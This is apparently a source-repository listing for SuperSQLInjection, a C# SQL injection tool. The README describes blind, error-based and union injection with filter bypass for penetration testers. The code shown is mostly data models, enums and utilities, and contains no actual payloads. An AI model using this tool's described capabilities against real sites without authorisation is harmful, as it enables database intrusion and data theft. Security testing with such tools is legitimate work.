├── 视频教程地址.txt ├── SuperSQLInjection ├── favicon.ico ├── Resources │ ├── bg.png │ └── article_top_nav_bg.png ├── Properties │ ├── images │ │ ├── bg.png │ │ ├── btn.png │ │ ├── bug.png │ │ ├── se.png │ │ ├── set.png │ │ ├── 下载.png │ │ ├── 保存.png │ │ ├── 关于.png │ │ ├── 声明.png │ │ ├── 导入.png │ │ ├── 导出.png │ │ ├── 手册.png │ │ ├── 更新.png │ │ ├── 版本.png │ │ ├── HTTP.png │ │ ├── Ilog.png │ │ ├── help.png │ │ ├── lang.png │ │ ├── line.png │ │ ├── m_bg.png │ │ ├── menu.png │ │ ├── stop.png │ │ ├── tool.png │ │ ├── vers.png │ │ ├── bypass.png │ │ ├── config.png │ │ ├── dbinfo.png │ │ ├── favicon.ico │ │ ├── getvers.png │ │ └── stop_red.png │ ├── Settings.settings │ ├── Settings.Designer.cs │ ├── AssemblyInfo.cs │ └── app.manifest ├── app.config ├── payload │ ├── DBPayload.cs │ ├── Access.cs │ ├── Comm.cs │ ├── SQLite.cs │ ├── DB2.cs │ └── Informix.cs ├── tools │ ├── http │ │ ├── model │ │ │ ├── HttpResponse.cs │ │ │ └── HttpRequest.cs │ │ ├── HttpProxy.cs │ │ ├── HttpTools.cs │ │ ├── TimeOutSocket.cs │ │ ├── HTTPRequest.cs │ │ └── SocketProxy.cs │ ├── smartthread │ │ ├── SLExt.cs │ │ ├── CanceledWorkItemsGroup.cs │ │ ├── InternalInterfaces.cs │ │ ├── SmartThreadPool.ThreadEntry.cs │ │ ├── STPEventWaitHandle.cs │ │ ├── SynchronizedDictionary.cs │ │ ├── WorkItemInfo.cs │ │ ├── Stopwatch.cs │ │ ├── EventWaitHandleFactory.cs │ │ ├── EventWaitHandle.cs │ │ ├── Exceptions.cs │ │ ├── WorkItemResultTWrapper.cs │ │ ├── CallerThreadContext.cs │ │ ├── WIGStartInfo.cs │ │ ├── PriorityQueue.cs │ │ └── WorkItem.WorkItemResult.cs │ ├── StringLengthComparer.cs │ ├── encode │ │ ├── URLTools.cs │ │ └── URLEncode.cs │ ├── MyCopare.cs │ ├── StringTools.cs │ ├── LikeMath.cs │ ├── ListViewColumnSorter.cs │ ├── OnlineMD5.cs │ └── XML.cs ├── model │ ├── InjectType.cs │ ├── LogLevel.cs │ ├── KeyType.cs │ ├── URL.cs │ ├── DBType.cs │ ├── SelectNode.cs │ ├── DataBase.cs │ ├── ErrorMessage.cs │ ├── GetDataPam.cs │ ├── Injection.cs │ ├── InjectLog.cs │ ├── Proxy.cs │ ├── ServerInfo.cs │ ├── 
SerializableDictionary.cs │ └── Config.cs ├── About.cs ├── Waring.cs ├── Program.cs ├── ShowResponse.cs ├── AddNode.cs ├── FindString.cs ├── Waring.Designer.cs ├── About.Designer.cs ├── AddNode.Designer.cs ├── FindString.Designer.cs ├── Seting.cs ├── AddNode.resx ├── Seting.resx ├── Waring.resx ├── FindString.resx ├── ShowResponse.resx ├── about.resx └── scan │ └── Spider.cs ├── 超级SQL注入工具使用说明书V1.1 20190303.docx ├── README.md ├── SuperSQLInjection.sln ├── .gitattributes └── .gitignore /视频教程地址.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/视频教程地址.txt -------------------------------------------------------------------------------- /SuperSQLInjection/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/favicon.ico -------------------------------------------------------------------------------- /超级SQL注入工具使用说明书V1.1 20190303.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/超级SQL注入工具使用说明书V1.1 20190303.docx -------------------------------------------------------------------------------- /SuperSQLInjection/Resources/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Resources/bg.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/bg.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/btn.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/btn.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/bug.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/bug.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/se.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/se.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/set.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/set.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/下载.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/下载.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/保存.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/保存.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/关于.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/关于.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/声明.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/声明.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/导入.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/导入.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/导出.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/导出.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/手册.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/手册.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/更新.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/更新.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/版本.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/版本.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/HTTP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/HTTP.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/Ilog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/Ilog.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/help.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/lang.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/lang.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/line.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/line.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/m_bg.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/m_bg.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/menu.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/stop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/stop.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/tool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/tool.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/vers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/vers.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/bypass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/bypass.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/config.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/config.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/dbinfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/dbinfo.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/favicon.ico -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/getvers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/getvers.png -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/images/stop_red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/stop_red.png -------------------------------------------------------------------------------- /SuperSQLInjection/Resources/article_top_nav_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Resources/article_top_nav_bg.png -------------------------------------------------------------------------------- /SuperSQLInjection/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 
-------------------------------------------------------------------------------- /SuperSQLInjection/payload/DBPayload.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace SuperSQLInjection.payload 7 | { 8 | class DBPayload 9 | { 10 | 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/http/model/HttpResponse.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace SuperSQLInjection.tools.http.model 7 | { 8 | class HttpResponse 9 | { 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/http/model/HttpRequest.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace SuperSQLInjection.tools.http.model 7 | { 8 | class HttpRequest 9 | { 10 | 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/SLExt.cs: -------------------------------------------------------------------------------- 1 | #if _SILVERLIGHT 2 | 3 | using System.Threading; 4 | 5 | namespace Amib.Threading 6 | { 7 | public enum ThreadPriority 8 | { 9 | Lowest, 10 | BelowNormal, 11 | Normal, 12 | AboveNormal, 13 | Highest, 14 | } 15 | } 16 | #endif 17 | 
-------------------------------------------------------------------------------- /SuperSQLInjection/model/InjectType.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.model 6 | { 7 | [Serializable] 8 | public enum InjectType 9 | { 10 | UnKnow = 0, 11 | Blind= 1, 12 | Error=2, 13 | Union = 3 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/LogLevel.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace SuperSQLInjection.model 7 | { 8 | public enum LogLevel 9 | { 10 | error = -1, 11 | info = 0, 12 | waring = 1, 13 | success = 2, 14 | 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/KeyType.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.model 6 | { 7 | [Serializable] 8 | public enum KeyType 9 | { 10 | Key=0, 11 | Reg = 1, 12 | Code =2, 13 | Time = 3, 14 | EQLen = 4, 15 | MaxLen =5, 16 | MinLen =6 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/URL.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.model 6 | { 7 | class URL 8 | { 9 | public String url; 10 | public int level; 11 | public URL(String url, int level) { 12 | 13 | this.url = url; 14 | this.level = level; 15 | 16 | } 17 | } 18 | } 19 | 
-------------------------------------------------------------------------------- /SuperSQLInjection/About.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Text; 7 | using System.Windows.Forms; 8 | 9 | namespace SuperSQLInjection 10 | { 11 | public partial class About : Form 12 | { 13 | public About() 14 | { 15 | InitializeComponent(); 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /SuperSQLInjection/Waring.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Text; 7 | using System.Windows.Forms; 8 | 9 | namespace SuperSQLInjection 10 | { 11 | public partial class Waring : Form 12 | { 13 | public Waring() 14 | { 15 | InitializeComponent(); 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/DBType.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.model 6 | { 7 | [Serializable] 8 | public enum DBType 9 | { 10 | UnKnow=0, 11 | Access=1, 12 | MySQL = 2, 13 | SQLServer = 3, 14 | Oracle = 4, 15 | PostgreSQL=5, 16 | DB2 = 6, 17 | SQLite=7, 18 | Informix=8 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/CanceledWorkItemsGroup.cs: -------------------------------------------------------------------------------- 1 | namespace Amib.Threading.Internal 2 | { 3 | internal class CanceledWorkItemsGroup 4 | { 5 | public readonly static 
CanceledWorkItemsGroup NotCanceledWorkItemsGroup = new CanceledWorkItemsGroup(); 6 | 7 | public CanceledWorkItemsGroup() 8 | { 9 | IsCanceled = false; 10 | } 11 | 12 | public bool IsCanceled { get; set; } 13 | } 14 | } -------------------------------------------------------------------------------- /SuperSQLInjection/model/SelectNode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using System.Windows.Forms; 5 | 6 | namespace SuperSQLInjection.model 7 | { 8 | public class SelectNode 9 | { 10 | public TreeNode tn = new TreeNode(); 11 | public int limit = 0; 12 | public String dbname = ""; 13 | public String tableName = ""; 14 | public String columnName = ""; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/DataBase.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Text; 6 | 7 | namespace SuperSQLInjection.model 8 | { 9 | [Serializable] 10 | public class DataBase 11 | { 12 | public SerializableDictionary>> tables=new SerializableDictionary>>(); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/ErrorMessage.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.model 6 | { 7 | public static class ErrorMessage 8 | { 9 | public static String mysql4_no_error_inject_info = "抱歉MySQL4数据库,不支持错误显示注入!"; 10 | public static String access_no_error_inject_info = "抱歉Access数据库,不支持错误显示注入!"; 11 | public static String access_no_key = "Access数据库需要关键字协助盲猜表明,所以大侠请你填写好关键字!"; 12 | } 13 | } 14 | 
-------------------------------------------------------------------------------- /SuperSQLInjection/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace SuperSQLInjection 6 | { 7 | /* Holds the process entry point of the Windows Forms application. */ static class Program 8 | { 9 | /// 10 | /// The main entry point for the application. 11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | /* Runs the message loop on a new instance of the form class named Main, a type not shown in this listing. */ Application.Run(new Main()); 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/GetDataPam.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using System.Windows.Forms; 5 | 6 | namespace SuperSQLInjection.model 7 | { 8 | /* Parameter holder with public mutable fields and explicit defaults. NOTE(review): the field names suggest it describes one data-retrieval request (database, table, columns, row limit) - confirm against the callers. */ class GetDataPam 9 | { 10 | 11 | public List columns = null; 12 | public int limit = 0; 13 | public String dbname = ""; 14 | public String table = ""; 15 | public Boolean isMuStr = false;// enable multi-byte 16 | public ListViewItem lvi = null; 17 | public int data_count =0; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/Injection.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace SuperSQLInjection.model 6 | { 7 | /* Plain data holder with public mutable fields that default to the empty string, 0 or false. NOTE(review): presumably one row of scan results - confirm against the code that fills it. */ public class Injection 8 | { 9 | public String url=""; 10 | public int index = 0; 11 | public bool isInjection =false; 12 | public String injectType = ""; 13 | public String payload=""; 14 | public String paramName = ""; 15 | public String dbType = ""; 16 | public String remark = ""; 17 | public String testUrl = ""; 18 | 19 | } 20 | } 21 | -------------------------------------------------------------------------------- 
/SuperSQLInjection/tools/StringLengthComparer.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace tools 7 | { 8 | /* Non-generic IComparer that orders strings by length, longest first. */ class StringLengthComparer : System.Collections.IComparer 9 | { 10 | /* Returns -1 when x is longer than y, 1 when it is shorter and 0 when the lengths are equal. Both arguments are cast to string, so a non-string argument throws InvalidCastException and a null argument throws NullReferenceException at the Length access. */ public int Compare(object x, object y) 11 | { 12 | string s1 = (string)x; 13 | 14 | string s2 = (string)y; 15 | 16 | if (s1.Length > s2.Length) return -1; 17 | 18 | if (s1.Length < s2.Length) return 1; 19 | return 0; 20 | 21 | } 22 | 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/InjectLog.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace SuperSQLInjection.model 7 | { 8 | /* Plain data holder with public mutable fields; strings default to empty, ints to 0, and new InjectType() / new DBType() yield the zero value of each enum. NOTE(review): the field names suggest one logged request per instance (target, payloads, raw request text) - confirm against the code that fills it. */ class InjectLog 9 | { 10 | public int id=0; 11 | public String ip= ""; 12 | public int port = 0; 13 | public String url = ""; 14 | public InjectType injectType = new InjectType(); 15 | public DBType dbType = new DBType(); 16 | public String usePayload = ""; 17 | public String testPayload = ""; 18 | public String request = ""; 19 | 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 超级SQL注入工具 2 | 简介: 3 | 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,采用C#开发,程序采用自写代码来操作HTTP交互,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;支持Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 4 | 工具特点: 5 | 1.支持任意地点出现的任意SQL注入。 6 | 2.支持全自动识别注入标记,也可人工识别注入并标记。 7 | 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 8 | 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 9 | 
5.依靠关键字/时间等进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。 10 | 6.程序采用自编码操作HTTP请求,HTTP发包和获取速度较快。 11 | 12 | 13 | SQL注入测试地址:http://test.shack2.org 14 | -------------------------------------------------------------------------------- /SuperSQLInjection/model/Proxy.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using System.Collections; 5 | 6 | namespace SuperSQLInjection.model 7 | { 8 | /* Serializable settings for one proxy, held in public mutable fields. NOTE(review): password is an ordinary string field on a [Serializable] type, so it would be written in clear text wherever instances are serialized - confirm how and where proxy entries are persisted. */ [Serializable] 9 | public class Proxy 10 | { 11 | public Proxy() { 12 | 13 | } 14 | public String host = ""; 15 | public int port = 0; 16 | public String proxyType = "HTTP";// socks5 or HTTP 17 | public String username = "";// proxy account 18 | public String password = "";// proxy password 19 | public String isOk ="未验证";// one of: 未验证 (not verified), 是 (yes), 否 (no) 20 | public int useTime = 0;// connection time used 21 | public String checkTime = "";// time of verification 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/encode/URLTools.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using model; 5 | 6 | namespace SuperSQLInjection.tools 7 | { 8 | class URLTools 9 | { 10 | /* Parses url with System.Uri and returns a new ServerInfo whose host, url and port fields carry Uri.Host, Uri.PathAndQuery and Uri.Port; the remaining ServerInfo fields are left as constructed. The Uri constructor throws on a null or malformed URL and that exception reaches the caller. */ public static ServerInfo getHostAndPathQueryByURL(String url){ 11 | 12 | try 13 | { 14 | ServerInfo server = new ServerInfo(); 15 | Uri uri = new Uri(url); 16 | server.host = uri.Host; 17 | server.url = uri.PathAndQuery; 18 | server.port = uri.Port; 19 | return server; 20 | } 21 | catch (Exception e) { 22 | 23 | /* NOTE(review): "throw e;" resets the stack trace; a bare "throw;" (or dropping the try/catch entirely) would preserve it. */ throw e; 24 | } 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/MyCopare.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | 6 | namespace SuperSQLInjection.tools 7 | { 8 | 
class MyCopare : System.Collections.IComparer 9 | { 10 | public int Compare(object x, object y) 11 | { 12 | string s1 = (string)x; 13 | 14 | string s2 = (string)y; 15 | 16 | if (s1.Length > s2.Length) return 1; 17 | 18 | if (s1.Length < s2.Length) return -1; 19 | 20 | for (int i = 0; i < s1.Length; i++) 21 | { 22 | 23 | if (s1[i] > s2[i]) return 1; 24 | 25 | if (s1[i] < s2[i]) return -1; 26 | 27 | } 28 | 29 | return 0; 30 | 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/InternalInterfaces.cs: -------------------------------------------------------------------------------- 1 | 2 | namespace Amib.Threading.Internal 3 | { 4 | /// 5 | /// An internal delegate to call when the WorkItem starts or completes 6 | /// 7 | internal delegate void WorkItemStateCallback(WorkItem workItem); 8 | 9 | internal interface IInternalWorkItemResult 10 | { 11 | event WorkItemStateCallback OnWorkItemStarted; 12 | event WorkItemStateCallback OnWorkItemCompleted; 13 | } 14 | 15 | internal interface IInternalWaitableResult 16 | { 17 | /// 18 | /// This method is intent for internal use. 
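19 | /// 20 | IWorkItemResult GetWorkItemResult(); 21 | } 22 | 23 | public interface IHasWorkItemPriority 24 | { 25 | WorkItemPriority WorkItemPriority { get; } 26 | } 27 | } 28 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/StringTools.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;

namespace SuperSQLInjection.tools
{
    /// <summary>
    /// Format checks for host names, dotted IPv4 addresses and short numbers.
    /// </summary>
    /// <remarks>
    /// Every pattern is anchored with \A and \z so the whole input has to match.
    /// An unanchored pattern accepts any string that merely contains a match,
    /// which lets malformed input pass as a valid host, address or number.
    /// </remarks>
    class StringTools
    {
        /// <summary>
        /// Tells whether the whole string is a dotted IPv4 address with four octets of 0-255.
        /// </summary>
        /// <param name="ipStr">Text to check; null or empty gives false.</param>
        /// <returns>true when the input is exactly four in-range octets separated by dots.</returns>
        public static bool CheckIsIP(String ipStr)
        {
            if (String.IsNullOrEmpty(ipStr))
            {
                return false;
            }

            Match m = Regex.Match(ipStr, @"\A([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\z");
            if (!m.Success)
            {
                return false;
            }

            // Three digits allow values up to 999, so each octet is range-checked as well.
            for (int i = 1; i <= 4; i++)
            {
                int octet = int.Parse(m.Groups[i].Value, System.Globalization.CultureInfo.InvariantCulture);
                if (octet > 255)
                {
                    return false;
                }
            }
            return true;
        }

        /// <summary>
        /// Tells whether the whole string looks like a host name: 1-100 word, dash or
        /// dot characters followed by 1-8 ASCII letters.
        /// </summary>
        /// <param name="ipStr">Text to check; null or empty gives false.</param>
        /// <returns>true when the complete input matches the host-name pattern.</returns>
        public static bool CheckIsDomain(String ipStr)
        {
            if (String.IsNullOrEmpty(ipStr))
            {
                return false;
            }
            return Regex.IsMatch(ipStr, "\\A[\\w\\-\\.]{1,100}[a-zA-Z]{1,8}\\z");
        }

        /// <summary>
        /// Tells whether the whole string is 1 to 5 ASCII digits.
        /// </summary>
        /// <param name="ipStr">Text to check; null or empty gives false.</param>
        /// <returns>true when the complete input is 1-5 digits and nothing else.</returns>
        public static bool IsNumber(String ipStr)
        {
            if (String.IsNullOrEmpty(ipStr))
            {
                return false;
            }
            return Regex.IsMatch(ipStr, @"\A[0-9]{1,5}\z");
        }

        /// <summary>
        /// Tells whether the string passes either the host-name or the IPv4 check.
        /// </summary>
        /// <param name="str">Text to check.</param>
        /// <returns>true when CheckIsDomain or CheckIsIP accepts the input.</returns>
        public static bool CheckIsDomainOrIP(String str)
        {
            return CheckIsDomain(str) || CheckIsIP(str);
        }
    }
}
--------------------------------------------------------------------------------
/SuperSQLInjection/model/ServerInfo.cs:
--------------------------------------------------------------------------------
1 | using System; 2 | using System.Collections.Generic; 3 | using System.Net; 4 | using System.Text; 5 | 6 | namespace model 7 | { 8 | public class ServerInfo 9 | { 10 | public String host = "";//host主机头 11 | public String url = "";//pathAndQuery 12 | public String method = "";//请求方法 13 | public int port = 80; 14 | public String request = ""; 15 | public String encoding = ""; 16 | public String header = ""; 17 | public String body = ""; 18 | public String reuqestBody = ""; 19 | public String reuqestHeader = ""; 20 | public Dictionary headers = new Dictionary(); 21 | public String response = ""; 22 | public String gzip = ""; 23 | public int length = 0;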
24 | public int code = 0; 25 | public int location = 0; 26 | public long runTime = 0;//获取网页消耗时间,毫秒 27 | public int sleepTime = 0;//休息时间 28 | public String cookies = ""; 29 | public Boolean timeout = false; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本:4.0.30319.42000 5 | // 6 | // 对此文件的更改可能会导致不正确的行为,并且如果 7 | // 重新生成代码,这些更改将会丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace SuperSQLInjection.Properties { 12 | 13 | 14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")] 16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { 17 | 18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 19 | 20 | public static Settings Default { 21 | get { 22 | return defaultInstance; 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /SuperSQLInjection/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 